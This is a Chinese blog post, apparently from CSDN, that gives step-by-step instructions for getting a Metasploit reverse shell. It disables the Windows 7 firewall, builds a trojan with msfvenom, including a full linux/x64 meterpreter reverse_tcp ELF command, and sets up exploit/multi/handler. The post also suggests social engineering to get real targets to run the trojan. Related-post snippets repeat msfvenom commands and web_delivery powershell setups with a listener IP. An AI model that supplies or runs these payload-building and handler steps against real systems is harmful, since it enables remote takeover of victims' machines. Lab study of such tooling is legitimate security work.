MSF上线

已于 2023-03-16 16:45:02 修改
阅读量1k 收藏 1
点赞数
文章标签: 安全 linux windows
于 2023-03-16 16:31:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51151498/article/details/129542091
版权

实验环境:

攻  击  机:kali-Linux

目标主机:windows7 / kali-Linux

工        具:msfvenom(kali预装)

windows7:

1.首先关闭防火墙

控制面板-关闭windows防火墙

 2.使用msfvenom生成木马

查看帮助

生成木马

3.打开监听

打开MSF

使用侦听模块:use exploit/multi/handler

设置选项:show options

设置IP和端口:

运行发现报错

排查发现payload和生成木马的payload不一致

修改payload

4.在目标主机windows7打开.exe文件      #实战中使用社工诱导目标打开木马

5.反弹shell,可执行命令

#后渗透命令请参考:后渗透命令参考

Linux:

目标主机是Linux x64系统

1.生成木马:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=攻击机IP  LPORT=9999 -f elf > pb.elf

ELF:Executable and Linkable Format   #可执行与可链接格式

2.打开监听

use exploit/multi/handler

3. 设置IP和端口

4.设置payload:linux/x64/meterpreter/reverse_tcp

6. 增加可执行权限

 执行:chmod +x pb.elf

7.运行

反弹shell

8.可执行命令

以上内容仅作为学习交流之用!

- Time
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
记一次完整体系的攻防演练的环境部署-映射公网-渗透getshell-上线frp-上线MSF实现内网远程渗透-打开远程桌面。
随心所欲不逾矩
02-27 763
前言,本次笔记是记录在工作中的一个攻防演练环境搭建和通过部署的应用存在的文件上传漏洞getshell,接着上线frp,接着上线msf,实现msf远程渗透。准备工作:1,在客户的内网环境部署一个Windows7系统,在这个系统上把finecms这个应用部署上去。把finecms安装之后,和客户沟通,把这个应用的地址映射到公网上去。2,其次,没有条件的话,自己在在wmware上装个虚拟机部署上去也行。
(记录向)使用MSF的web_delivery模块上线
daxi0ng的博客
11-30 1377
前言:在msf上生成木马传到目标机器执行上线累死个人,还是一条命令上线比较舒服。 目标环境: Centos6.5 1、选择exploit/multi/script/web_delivery模块 2、选择目标系统,我这里选择Linux 3、选择payload,我这里选择linux/x64/meterpreter/reverse_tcp , 4、本机监听一下 5、运行,生成一条命令 6、目标机器执行上线。 7、获取一个友好的交互界面。python -c 'import ...
上线MSF(Metasploit)的几种常见方式
qq_46258964的博客
04-14 8870
powershell上线 利用powershell上线msf 对应模块use exploit/multi/script/web_delivery use exploit/multi/script/web_delivery set target 2 set payload windows/x64/meterpreter/reverse_tcp set lhost 172.16.1.10 set lport 6666 run 复制对应的powershell代码到Windows主机中执行便可以上线msf m
MSF技术总结
05-07
metasploit framework 常用命令说明和使用,及其他高级用法的使用总结
kali 渗透msf
11-14
kali渗透测试利器
MSF模拟渗透测试攻击linux实例
lza20001103的博客
04-09 9005
MSF模拟渗透测试攻击linux实例
一条命令上线MSF(Metasploit)-web_delivery模块
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
10-31 2364
一条命令上线MSF(Metasploit)-web_delivery模块
【内网安全】代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线
今天是几号的博客
03-18 1199
先将msf代理流量转发至本地1234端口,然后使用代理工具连接该端口,进行流量转发。注意:实验之前查看靶机操作系统是否是64位,否则使用msf生成x84架构的木马。SocksCap Proxifier ProxyChains等。忽略细节,将msf_7777放置windows 7上,直接上线。#网络通讯-MSF&CS-路由添加&节点建立。#控制上线-MSF&CS-协议生成&正反连接。监听器:bind_tcp port。操作:代理转发-Socks代理。msf 内网流量转发代理。cs 内网流量转发代理。
msf生成linux elf木马反弹shell
热门推荐
weixin_45632448的博客
04-08 1万+
最开始用的生成木马的命令 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf 生成木马只有250b,显然是不成功的 问题根源: msf版本不同导致语法不同 msf5版本的命令 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf >
【内网安全】——msf木马生成教程
Demo不是emo的博客
01-30 5215
msfvenom生成木马教程
msf windows
09-22
msf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windows
msf开发者文档
09-28
此为msf开发文档,项移植应用msf可以阅读。msf采用ruby编写。
msf命令全集
06-05
msf命令全集
linux系统安装msf的过程详解
VN520的博客
12-14 223
到此这篇关于linux系统安装msf的过程详解的文章就介绍到这了,更多相关linux系统安装msf内容请搜索ZaLou.Cn以前的文章或继续浏览下面的相关文章希望大家以后多多支持ZaLou.Cn!
msf 框架linux,在Kali Linux 2020.x上启动Metasploit框架(Metasploit Framework)
weixin_32179749的博客
05-16 639
本文介绍在Kali Linux 2020.x系统上启动Metasploit框架(Metasploit Framework)的方法。参考在Debian 10/9系统上安装Metasploit Framework的方法。前提1、Metasploit框架服务PostgreSQL数据库服务器-Metasploit用来存储项目中的数据。Ruby on Rails。Metasploit服务。2、Metaspl...
CS\MSF进阶-拓展应用
weixin_51151498的博客
06-14 259
渗透框架
cs linux内网渗透,记一次利用cs进行内网渗透的过程
weixin_30830643的博客
05-15 761
记一次利用cs进行内网渗透的过程​首先搭建好cs的服务端和客户端连接,下面正式进行渗透环境kali:192.168.0.226域控机:192.168.0.138成员机:192.168.0.251 192.168.0.141操作cs上线首先开启监听cobalt->listeners,host和beacons都为cs服务端的ip地址生成相应的windows木马,上传到靶机251中执行。选择对应的...
msf渗透linux教程,Metasploit后门渗透Linux系统以及跨平台后门生成
weixin_31312621的博客
05-03 1569
本帖最后由 小爱_Joker 于 2017-3-9 12:30 编辑标题:Metasploit后门渗透Linux系统以及跨平台后门生成作者:小爱_Joker难度:两级阅读点:使用Metasploit生成多种后门从而快速渗透linux系统上次发的那个Metasploit使用php后门渗透linux主机 不造为啥不能shell 使用终端 有点尴尬。攻击者IP:192.168.0.5受害者IP:192....
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
最新发布
NewsMash的博客
05-15 136
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
msf上线Windows实战
08-21
在f上线Windows实战中,可以使用msfvenom工具一个exe木马文件。生成木马的命令是"msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=监听端口 -f exe > 文件名.exe"。其中,LHOST是攻击机的IP地址,LPORT是监听的端口号。生成的exe文件可以通过各种方式传递给目标Windows系统进行实战操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [msf windows版](https://download.csdn.net/download/baidu_35488871/12879062)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [Windows网络服务渗透测试实战-MSF恶意程序利用](https://blog.csdn.net/c_lanxiaofang/article/details/124879375)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [MSF上线](https://blog.csdn.net/weixin_51151498/article/details/129542091)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值